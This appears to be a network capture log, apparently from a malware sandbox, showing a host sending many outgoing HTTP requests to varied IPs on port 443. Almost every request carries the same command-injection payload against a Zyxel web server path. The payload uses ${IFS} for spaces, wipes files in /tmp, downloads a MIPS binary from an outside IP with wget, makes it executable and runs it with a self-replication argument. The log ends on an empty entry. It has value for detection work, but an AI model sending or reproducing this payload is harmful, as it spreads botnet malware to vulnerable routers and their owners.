                                    Jan 13, 2024 19:02:29.057256937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3082192.168.2.13480048.95.214.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057315111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3083192.168.2.134402453.242.250.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057365894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3084192.168.2.1353210102.230.209.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057439089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3085192.168.2.1339462185.66.64.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057488918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3086192.168.2.1344742184.37.236.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057540894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3087192.168.2.1339390123.71.158.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057585955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3088192.168.2.1341058223.220.118.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057602882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3089192.168.2.133298298.88.160.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057665110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3090192.168.2.13471585.177.166.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057708979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3091192.168.2.1357538150.161.53.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057756901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3092192.168.2.1358924133.71.131.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057807922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3093192.168.2.1358930135.246.123.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057852983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3094192.168.2.1360276135.15.97.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057919025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3095192.168.2.133588273.24.253.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057980061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3096192.168.2.1338600133.44.215.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058012962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3097192.168.2.133357051.114.244.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058058977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3098192.168.2.1348718220.107.230.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058121920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3099192.168.2.135628275.241.143.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058186054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3100192.168.2.135158818.36.119.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058226109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3101192.168.2.1360584111.199.44.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058258057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3102192.168.2.13368789.86.60.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058310032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3103192.168.2.133616058.100.55.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058372974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3104192.168.2.1337466159.106.0.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058412075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3105192.168.2.1358710153.130.8.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058479071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3106192.168.2.1345236212.107.97.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058545113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3107192.168.2.1346660208.14.9.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058595896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3108192.168.2.1352820185.163.152.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058640003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3109192.168.2.1338502171.179.187.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058701038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3110192.168.2.1347140117.211.146.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058751106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3111192.168.2.13460589.208.70.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058794975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3112192.168.2.134330479.252.28.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058828115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3113192.168.2.1346250141.143.244.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058903933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3114192.168.2.13343828.203.131.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.058964014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3115192.168.2.1346964208.170.69.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059034109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3116192.168.2.134465880.231.237.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059067965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3117192.168.2.135690044.61.169.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059113979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3118192.168.2.133966090.103.207.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059195042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3119192.168.2.1352246152.67.241.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059246063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3120192.168.2.1358044221.22.197.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059335947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3121192.168.2.135353871.154.165.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059334993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3122192.168.2.135365092.108.191.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059406042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3123192.168.2.1359236166.15.241.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059478998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3124192.168.2.1359626217.47.162.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059521914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3125192.168.2.133365841.25.23.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059561014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3126192.168.2.135031819.238.124.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059623003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3127192.168.2.1351626208.221.160.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059681892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3128192.168.2.135905842.166.161.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059711933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3129192.168.2.135017696.160.108.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059778929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3130192.168.2.135382069.17.134.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059822083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3131192.168.2.134342687.249.209.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059869051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3132192.168.2.134678218.147.192.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.059942961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3133192.168.2.1335210175.216.124.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060000896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3134192.168.2.1360216116.229.249.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060053110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3135192.168.2.135107460.212.188.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060085058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3136192.168.2.1354082180.101.33.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060133934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3137192.168.2.134498638.210.12.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060199976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3138192.168.2.135618448.78.254.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060276031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3139192.168.2.1360636104.219.132.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060323000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3140192.168.2.1355848142.213.92.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060355902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3141192.168.2.133457438.208.14.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060451984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3142192.168.2.134099861.227.60.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060535908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3143192.168.2.1360206191.60.228.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.060575962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3144192.168.2.1334776184.6.37.111443
                                    TimestampBytes transferredDirectionData
